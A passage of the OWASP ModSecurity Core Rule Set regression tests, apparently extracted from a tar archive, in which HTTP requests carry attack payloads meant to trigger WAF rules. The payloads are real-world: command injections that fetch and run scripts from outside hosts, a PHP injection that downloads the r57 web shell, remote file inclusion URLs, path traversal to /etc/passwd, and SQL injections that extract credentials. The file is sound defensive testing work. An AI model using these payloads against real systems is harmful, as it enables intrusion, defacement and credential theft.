Windows NT 5.1; SV1; .NET CLR 2.0.50727) Havij %var ua=Arachni/0.2.1 %var ua=w3af.sourceforge.net %request GET / HTTP/1.0 Host: $hostname User-Agent: $ua Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Request Indicates a Security Scanner Scanned the Site (990901) ##################################################### %output 990901 %var header=Acunetix-Product: WVS/5.0 (Acunetix Web Vulnerability Scanner - EVALUATION) %request GET / HTTP/1.0 Host: $hostname User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) $header Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Request Indicates a Security Scanner Scanned the Site (990902) ##################################################### %output 990902 %var file=/nessustest %request GET $file HTTP/1.0 Host: $hostname User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) $header Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Rogue web site crawler (990012) ##################################################### %output 990012 %var ua=DataCha0s/2.0 %var ua=Morfeus Fucking Scanner %var ua=VoidEYE %request GET / HTTP/1.0 Host: $hostname User-Agent: $ua Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %endtest �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity_crs_40_generic_attacks.tests������������������������������������������������������������0000775�0000000�0000000�00000046227�12164572564�0036135�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/tests���������������������������������������������������������������������������������������������������%timeout 6 %test System Command Injection (950907) ################################### %output 950907 %var command=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf *.txt'); %var command=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php %request GET /?foo=$command HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Injection of Undocumented ColdFusion Tags (950008) ################################### %output 950008 %var cf_command=cfusion_decrypt(string%2ckey) %var cf_command=%3CCFINTERNALDEBUG%20ACTION%3D%22pcode%22%20OUTVAR%3D%22r_var%22%20TEMPLATEPATH%3D%22%23template%23%22%3E %request GET /?foo=$cf_command HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test LDAP Injection Attack (950010) ################################### %output 950010 %var ldap_command=jsmith)(|(objectclass=*) %var ldap_command=joe)(|(password=* %var ldap_command=(&(objectClass=*)(objectClass=resources)) %request GET /?foo=$ldap_command HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test SSI Injection Attack (950011) ################################### %output 950011 %var ssi_command=%3C!--%23exec%20cmd%3D%22ls%22%20--%3E %var ssi_command=%3C!--%23include%20virtual%3D%22%2Fetc%2Fpasswd%22%20--%3E %request GET /?foo=$ssi_command HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Universal PDF XSS URL Detected (950018) ################################### %output 950018 %var updf=http%3A%2F%2Fwww.example.com%2Ffile.pdf%23a%3Djavascript%3Aalert('Alert') %request GET /?foo=$updf HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Email Injection Attack (950019) ##################################################### %output 950019 %request POST / HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: $CONTENT_LENGTH body=email@anonymous.xxx%0ATo:email1@who.xxx %test HTTP Request Smuggling Attack (950012) ################################### %output 950012 %request GET / HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Transfer-Encoding: utf-8 Transfer-Encoding: utf-8 Keep-Alive: 300 Proxy-Connection: keep-alive %test HTTP Request Smuggling (950012) ################################### %output 950012 %request POST / HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Content-Type: application/x-www-form-urlencoded Keep-Alive: 300 Proxy-Connection: keep-alive Content-Length: 3 Content-Length: 3 abc %test HTTP response splitting (950910) ################################### %output 950910 %request GET /?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html> HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Referer: http://www.mummy.com/index.html Accept-Language: zh-sg Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: $hostname Keep-Alive: 300 Proxy-Connection: keep-alive %test HTTP response splitting (950911) ################################### %output 950911 %request GET /?lang=foobar%3Cmeta%20http-equiv%3D%22Refresh%22%20content%3D%220%3B%20url%3Dhttp%3A%2F%2Fwww.hacker.com%2F%22%3E HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Referer: http://www.mummy.com/index.html Accept-Language: zh-sg Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: $hostname Keep-Alive: 300 Proxy-Connection: keep-alive %test Remote File Inclusion Attack (950117) ################################### %output 950117 %request GET /wp-content/themes/thedawn/lib/scripts/timthumb.php?src=http://66.240.183.75/crash.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Referer: http://www.mummy.com/index.html Accept-Language: zh-sg Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: $hostname Keep-Alive: 300 Proxy-Connection: keep-alive %test Remote File Inclusion Attack (950118) ################################### %output 950118 %var rfi=/plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.luomoeillegno.com/extras/idxx.txt?? %var rfi=/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt %var rfi=/plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.luomoeillegno.com/extras/idxx.txt %request GET $rfi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Referer: http://www.mummy.com/index.html Accept-Language: zh-sg Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: $hostname Keep-Alive: 300 Proxy-Connection: keep-alive %test Remote File Inclusion Attack (950119) ################################### %output 950119 %var rfi=/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.ezonplaza.com/img/idFARIZ.txt? %var rfi=/bbs//skin/ggambo7002_board/write.php?dir=http://www.solmae.co.kr/upload/bbs/conf2.txt???? %var rfi=/components/com_uhp/uhp_config.php?mos/administrator/c/appserv/appserv/main.php?appserv_root=http://henry14.isfreeweb.com/zboard/id/auto1.txt???? %request GET $rfi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Referer: http://www.mummy.com/index.html Accept-Language: zh-sg Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: $hostname Keep-Alive: 300 Proxy-Connection: keep-alive %test Remote File Inclusion Attack (950120) ################################### %output 950120 %var rfi=/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.ezonplaza.com/img/idFARIZ.txt?? %var rfi=/bbs//skin/ggambo7002_board/write.php?dir=http://www.solmae.co.kr/upload/bbs/conf2.txt? %var rfi=/components/com_uhp/uhp_config.php?mos/administrator/c/appserv/appserv/main.php?appserv_root=http://henry14.isfreeweb.com/zboard/id/auto1.txt??? %request GET $rfi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Referer: http://www.mummy.com/index.html Accept-Language: zh-sg Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: $hostname Keep-Alive: 300 Proxy-Connection: keep-alive %test Session Fixation Attack (950009) ################################### %output 950009 %request GET /foo.php?bar=blah<script>document.cookie="sessionid=1234;%20domain=.example.dom";</script> HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Referer: http://www.mummy.com/index.html Accept-Language: zh-sg Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: $hostname Keep-Alive: 300 Proxy-Connection: keep-alive %test Session Fixation Attack (950000) ################################### %output 950000 %request GET /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Accept-Language: zh-sg Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: $hostname Keep-Alive: 300 Proxy-Connection: keep-alive %test Session Fixation Attack (950003) ################################### %output 950003 %request GET /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Accept-Language: zh-sg Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: $hostname Referer: http://forum.antichat.ru/forum127.html Keep-Alive: 300 Proxy-Connection: keep-alive %test Remote File Access Attempt (950005) ################################### %output 950005 %var file=../../../../../boot.ini %var file=/etc/passwd %var file=../../../../../../../../../../usr/local/app/apache2/conf/httpd.conf %request GET /index.php?file=News&op=$file%00 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Accept-Language: zh-sg Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: $hostname Keep-Alive: 300 Proxy-Connection: keep-alive %test System Command Access (950002) ################################### %output 950002 %var file=/d/winnt/system32/cmd.exe?/c+dir. %request GET /foo.aspx?$file HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Accept-Language: zh-sg Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: $hostname Keep-Alive: 300 Proxy-Connection: keep-alive %test System Command Injection (950006) ################################### %output 950006 %var command=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf *.txt'); %var command=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php %request GET /?foo=$command HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test PHP Injection Attack (959151) ################################### %output 959151 %var command=<?exec('wget%20http://r57.biz/r57.txt%20-O shell.php');?> %var command=%3C%3Fphp%20echo(%5C%22KURWA%5C%22)%3B%20file_put_contents(%5C%22.%2Findex.php%5C%22%2C%20base64_decode(%5C%22Pz48aWZyYW1lIHNyYz0iaHR0cDovL3p1by5wb2Rnb3J6Lm9yZy96dW8vZWxlbi9pbmRleC5waHAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT48P3BocA%3D%3D%5C%22)%2C%20FILE_APPEND)%3B%20%3F%3E %request GET /?foo=$command HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test PHP Injection Attack (958976) ################################### %output 958976|958977 %var php_code=%20%20if%20(!function_exists(%22fs_copy_dir%22))%20%7B%0A%20%20%20%20function%20fs_copy_dir(%24d%2C%24t)%20%7B%0A%20%20%20%20%20%20%24d%20%3D%20str_replace(%22%5C%5C%22%2CDIRECTORY_SEPARATOR%2C%24d)%3B%0A%20%20%20%20%20%20if%20(substr(%24d%2C-1)%20!%3D%20DIRECTORY_SEPARATOR)%20%7B%24d%20.%3D%20DIRECTORY_SEPARATOR%3B%7D%0A%20%20%20%20%20%20%24h%20%3D%20opendir(%24d)%3B%0A%20%20%20%20%20%20while%20((%24o%20%3D%20readdir(%24h))%20!%3D%3D%20FALSE)%20%7B%0A%20%20%20%20%20%20%20%20if%20((%24o%20!%3D%20%22.%22)%20and%20(%24o%20!%3D%20%22..%22))%20%7B%0A%20%20%20%20%20%20%20%20%20%20if%20(!is_dir(%24d.DIRECTORY_SEPARATOR.%24o))%20%7B%24ret%20%3D%20copy(%24d.DIRECTORY_SEPARATOR.%24o%2C%24t.DIRECTORY_SEPARATOR.%24o)%3B%7D%0A%20%20%20%20%20%20%20%20%20%20else%20%7B%24ret%20%3D%20mkdir(%24t.DIRECTORY_SEPARATOR.%24o)%3B%20fs_copy_dir(%24d.DIRECTORY_SEPARATOR.%24o%2C%24t.DIRECTORY_SEPARATOR.%24o)%3B%7D%0A%20%20%20%20%20%20%20%20%20%20if%20(!%24ret)%20%7Breturn%20%24ret%3B%7D%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20closedir(%24h)%3B%0A%20%20%20%20%20%20return%20TRUE%3B%0A%20%20%20%20%7D %var php_code=echo%20sr(15%2C%22%3Cb%3E%22.%24lang%5B%24language.'_text16'%5D.%24arrow.%22%3C%2Fb%3E%22%2C%22%3Cselect%20name%3D%5C%22method%5C%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Coption%20value%3D%5C%22system%5C%22%20%3C%3F%20if%20(%24method%3D%3D%5C%22system%5C%22)%20%7B%20echo%20%5C%22selected%5C%22%3B%20%7D%20%3F%3Esystem%3C%2Foption%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Coption%20value%3D%5C%22passthru%5C%22%20%3C%3F%20if%20(%24method%3D%3D%5C%22passthru%5C%22)%20%7B%20echo%20%5C%22selected%5C%22%3B%20%7D%20%3F%3Epassthru%3C%2Foption%3E%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Coption%20value%3D%5C%22exec%5C%22%20%3C%3F%20if%20(%24method%3D%3D%5C%22exec%5C%22)%20%7B%20echo%20%5C%22selected%5C%22%3B%20%7D%20%3F%3Eexec%3C%2Foption%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Coption%20value%3D%5C%22shell_exec%5C%22%20%3C%3F%20if%20(%24method%3D%3D%5C%22shell_exec%5C%22)%20%7B%20echo%20%5C%22selected%5C%22%3B%20%7D%20%3F%3Eshell_exec%3C%2Foption%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Coption%20value%3D%5C%22popen%5C%22%20%3C%3F%20if%20(%24method%3D%3D%5C%22popen%5C%22)%20%7B%20echo%20%5C%22selected%5C%22%3B%20%7D%20%3F%3Epopen%3C%2Foption%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Coption%20value%3D%5C%22proc_open%5C%22%20%3C%3F%20if%20(%24method%3D%3D%5C%22proc_open%5C%22)%20%7B%20echo%20%5C%22selected%5C%22%3B%20%7D%20%3F%3Eproc_open%3C%2Foption%3E %request POST / HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: $CONTENT_LENGTH body=$php_code %endtest �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity_crs_41_sql_injection_attacks.tests������������������������������������������������������0000775�0000000�0000000�00000021007�12164572564�0037350�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/tests���������������������������������������������������������������������������������������������������%timeout 10 # File 41 SQL Injection Attacks %request GET /?v=$sig HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0. Keep-Alive: 300 Proxy-Connection: keep-alive %test SQL Comment Sequence Detected (981231) ######################################## %output 981231 %var sig=SELECT%2F*avoid-spaces*%2Fpassword%2F**%2FFROM%2F**%2FMembers %var sig=%E2%80%98%20or%201%3D1%23%0A %var sig=%E2%80%98%20or%201%3D1--%20- %endtest %test SQL Hex Encoding Identified (981260) ######################################## %output 981260 %var sig=1%20and%201%3D0%20%20Union%20Select%20%20%20UNHEX(HEX(concat(0x5B6B65795D%2Ctable_name%2C0x5B6B65795D)))%20%20%20FROM%20INFORMATION_SCHEMA.tables%20where%20table_schema%3DConcat(char(109)%2Cchar(101)%2Cchar(115)%2Cchar(115)%2Cchar(110)%2Cchar(101)%2Cchar(114)%2Cchar(98)%2Cchar(95)%2Cchar(119)%2Cchar(114)%2Cchar(100)%2Cchar(49)%2Cchar(50))%20LIMIT%201%2C1-- %var sig=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536-- %endtest %test SQL Injection Attack: Common Injection Testing Detected (981318) ######################################## %output 981318 %var sig='%20and%200%20union%20select%201%2C2%2C3%2Cusername%2C5%2Cpassword%2C7%2C8%2C9%2C10%2C11%20from%20%23__users%23 %var sig=-1)%20UNION%20SELECT%201%2C2%2C3%2Cconcat(USER()%2C' %endtest %test SQL Injection Attack: SQL Operator Detected (981319) ######################################## %output 981319 %var sig=-4%20union%20select%201%2C2%2C(select(%40x)from(select(%40x%3A%3D0x00)%2C(select(null)from(information_schema.columns)where(table_schema!%3D0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(%40x%3A%3Dconcat(%40x%2C0x3c62723e%2Ctable_schema%2C0x2e%2Ctable_name%2C0x3a%2Ccolumn_name))))x)-- %var sig=14380586%20and%20user()%3C%3E1 %var sig=2946%20and%20ascii(substring((user())%2C1%2C1))%3E%3D1%2F* %endtest %test SQL Injection Attack: SQL Tautology Detected (950901) ######################################## %output 950901 %var sig=-9'%20union%20select%20concat(version())%2C2%2C3%2C4%2C5%2C6and'1'%3D'1 %var sig=1'%20or%20'1'!%3D'2%20order%20by%201-- %endtest %test SQL Injection Attack: Common DB Names Detected (981320) ######################################## %output 981320 %var sig=3%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2Cconcat(user()%2Cversion()%2Cdatabase())%2C8%20from%20information_schema.tables %var sig=918%20union%20select%200%2C1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%20from%20msysobjects%20in%20'.' %endtest %test SQL SELECT Statement Anomaly Detection Alert (981317) ######################################## %output 981317 %var sig=247'%20and%201%3D1%20union%20all%20select%201%2C2%2C3%2C4%2C5%2Cconcat(username%2Cchar(58)%2Cpasswort)%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%20from%20az_user%2F* %var sig=5%20and%201%3D(select%20first%201%20distinct%20rdb%24relation_name%20from%20rdb%24relations%20where%20rdb%24system_flag%3D0)-- %endtest %test Blind SQL Injection Attack (950007) ######################################## %output 950007 %var sig=-2511%20union%20select%20table_name%20from%20sys.all_tables-- %var sig=1%20union%20select%201%2Cnull%2Cnull%2Cnull%2Ctable_name%7C%7Cchr(58)%7C%7Ccolumn_name%7C%7Cchr(58)%7C%7Cdata_type%20from%20(select%20a.*%2Crownum%20rnum%20from%20(select%20*%20from%20user_tab_columns%20where%20table_name%3Dchr(76)%7C%7Cchr(79)%7C%7Cchr(71)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(83)%20order%20by%20column_name)%20a%20where%20rownum%20%3C%3D%201)%20where%20rnum%20%3E%3D%201-- %endtest %test SQL Injection Attack (950001) ######################################## %output 950001 %var sig=10%20UNION%20exec%20master..xp_cmdshell%20'dir' %var sig=1'%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(mid(concat_ws(0x0b%2Cversion()%2Cuser()%2Cdatabase()%2C%40%40version_compile_os%2C0x0b)%2C1%2C63)%2C%20floor(rand(0)*2)))-- %endtest %test SQL Injection Attack (959070) ######################################## %output 959070 %var sig=-247%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2Cconcat_ws(0x3a%2Cversion()%2Cdatabase()%2CuseR())%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36%2C37%2C38%2C39%0A1%20having%201%3D1-- %var sig=256%20%20AND%201%3Cascii(substring((SELECT%20column_name%20FROM%20information_schema.columns%20WHERE%20table_name%20like%20char(105%2C109%2C103%2C101%2C115)%20limit%201%2C1)%2C1%2C1)) %endtest %test SQL Injection Attack (959071) ######################################## %output 959071 %var sig=1'%20or%201%3D(SELECT%20TOP%201%20email%20FROM%20cdrequests%20where%20id%3D2000)-- %var sig=1'%20or%20'1'%3D'1%20order%20by%201-- %endtest %test SQL Injection Attack (959072) ######################################## %output 959072 %var sig=99999999%20and%201%3D2%20union%20select%201%2Cconcat(user()%2Cchar(58)%2Cversion()%2Cchar(58)%2Cdatabase())%2C3%2C4%2F* %var sig=-9'%20union%20select%20concat(version())%2C2%2C3%2C4%2C5%2C6%2Cand'1'%3D'1 %endtest %test SQL Injection Attack (950908) ######################################## %output 950908 %var 